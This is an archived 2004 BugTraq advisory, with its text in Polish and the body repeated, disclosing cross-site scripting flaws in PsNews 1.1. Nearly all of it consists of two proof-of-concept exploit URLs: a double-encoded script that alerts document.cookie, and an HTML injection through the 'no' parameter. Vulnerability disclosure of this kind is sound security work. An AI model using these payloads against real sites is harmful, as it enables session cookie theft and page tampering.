BugTraq
Back to list
|
Post reply
Bug XSS in PsNews 1.1
Sep 05 2004 06:52PM
Michal Blaszczak (wacky nicponie org)
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky (at) nicponie (dot) org [email concealed]
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|Błąd Cross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------
Exploit:
a)
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528doc
ument.cookie);%253c/script>
b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20c
olor=red>%20<b>%20WackY%20%20</font>
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
*5-9-2004
*Autor: wacky
*E-mail: wacky (at) nicponie (dot) org [email concealed]
*WWW: http://www.nicponie.org
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
-----------------------------------------------
|Błąd Cross-Site Scripting (XSS) w PsNews 1.1 |
-----------------------------------------------
Exploit:
a)
http://[target]/index.php?function=show_all&no=%253cscript>alert%2528doc
ument.cookie);%253c/script>
b)
http://[target]/index.php?function=add_kom&no=">%20<font%20size="20"%20c
olor=red>%20<b>%20WackY%20%20</font>
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
http://www.nicponie.org/
[ reply ]